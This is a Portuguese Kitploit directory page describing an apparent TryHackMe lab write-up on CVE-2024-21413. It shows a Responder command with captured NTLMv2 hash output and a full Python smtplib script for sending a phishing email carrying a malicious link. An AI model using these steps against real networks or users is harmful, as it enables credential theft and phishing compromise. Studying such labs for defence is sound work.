Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Project-NTLM-Hash-Capture-and-Phishing-Email-Exploitation-for-CVE-2024-21413 — O projeto foi criado para demonstrar o uso de várias ferramentas para capturar hashes NTLM de usuários em uma rede e para executar ataques de phishing usando e-mail. Isso mostra como vulnerabilidades de autenticação de rede e métodos de phishing podem ser explorados para comprometer sistemas. | Kitploit
Ferramentas/GitHubGitHub/artemcyberlab/project-ntlm-hash-capture-and-phishing-email-exploitation-for-cve-2024-21413
OSINT (Inteligência de Fontes Abertas)Quebra de SenhasReconhecimentoExploraçãoPhishingEngenharia SocialAprendizado e EducaçãoLabs e Prática

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

GitHub
artemcyberlab/project-ntlm-hash-capture-and-phishing-email-exploitation-for-cve-2024-21413

Project-NTLM-Hash-Capture-and-Phishing-Email-Exploitation-for-CVE-2024-21413

Ver Repositório
há 1 anoAinda não revisado

O projeto foi criado para demonstrar o uso de várias ferramentas para capturar hashes NTLM de usuários em uma rede e para executar ataques de phishing usando e-mail. Isso mostra como vulnerabilidades de autenticação de rede e métodos de phishing podem ser explorados para comprometer sistemas.

Compartilhar

Objetivo do Projeto: O projeto foi criado para demonstrar o uso de várias ferramentas para capturar hashes NTLM de usuários em uma rede e para executar ataques de phishing usando e-mail. Isso mostra como vulnerabilidades de autenticação de rede e métodos de phishing podem ser explorados para comprometer sistemas.

Descrição do Processo

  1. Capturando Hashes NTLM usando o Responder Inicialmente, usei a ferramenta Responder para capturar hashes de autenticação pela rede. O Responder permite interceptar consultas como LLMNR, NBT-NS e MDNS para coletar hashes NTLM de usuários. Este é um passo importante para ataques que visam obter acesso a sistemas usando hashes capturados.

Executei o seguinte comando para iniciar o Responder:

root@ip-10-10-192-145:~# sudo responder -I ens5

Configurei o Responder para ouvir na interface ens5. Ele imediatamente começou a interceptar requisições de autenticação, permitindo-me visualizar hashes NTLM de usuários na rede, como THM-MONIKERLINK\tryhackme e WORKGROUP\Administrator. Aqui está como a saída se parecia ao capturar os hashes:

[SMB] NTLMv2-SSP Client : ::ffff:10.10.251.212 [SMB] NTLMv2-SSP Username : THM-MONIKERLINK\tryhackme [SMB] NTLMv2-SSP Hash : tryhackme::THM-MONIKERLINK:0b8bfa4ac2e8a954:4E86E98E55FBE019FB31815DDD4445DB

Esses hashes podem então ser usados para ataques como força bruta ou ataques de hash.

  1. E-mails de Phishing com Exploit Em seguida, criei um e-mail de phishing contendo um link para um arquivo malicioso. Usando um script Python com a biblioteca smtplib, enviei o e-mail para o endereço da vítima. O e-mail continha um link HTML que parecia seguro, mas na verdade levava a um arquivo projetado para explorar uma vulnerabilidade.

O link de phishing no e-mail se parecia com isto:

Clique em mim

Aqui está o script Python completo usado para enviar o e-mail de phishing:

import smtplib from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart from email.utils import formataddr

sender_email = '[email protected]' receiver_email = '[email protected]' password = input("Enter your attacker email password: ")

html_content = """\

Click me

"""

message = MIMEMultipart() message['Subject'] = "CVE-2024-21413" message["From"] = formataddr(('CMNatic', sender_email)) message["To"] = receiver_email

msgHtml = MIMEText(html_content, 'html') message.attach(msgHtml)

server = smtplib.SMTP('10.10.251.212 ', 25) server.ehlo()

try: server.login(sender_email, password) except Exception as err: print(err) exit(-1)

try: server.sendmail(sender_email, [receiver_email], message.as_string()) print("\nEmail delivered") except Exception as error: print(error) finally: server.quit()

Este script envia um e-mail com um link malicioso, que poderia potencialmente explorar a vulnerabilidade CVE-2024-21413.

Resultados Como resultado, consegui demonstrar dois aspectos principais:

  • Capturar hashes NTLM usando a ferramenta Responder, que é um passo crucial para atacar a autenticação de rede.

  • Phishing e exploração de vulnerabilidades via e-mail usando o script Python. O envio de e-mails de phishing com links maliciosos pode enganar usuários e levar ao comprometimento do sistema.

Este projeto mostrou como vulnerabilidades de rede e ataques de phishing podem ser explorados para obter acesso a sistemas. Também destacou a importância de se defender contra tais ataques através de métodos de autenticação robustos e filtragem de tráfego de e-mail.

Baixar ferramenta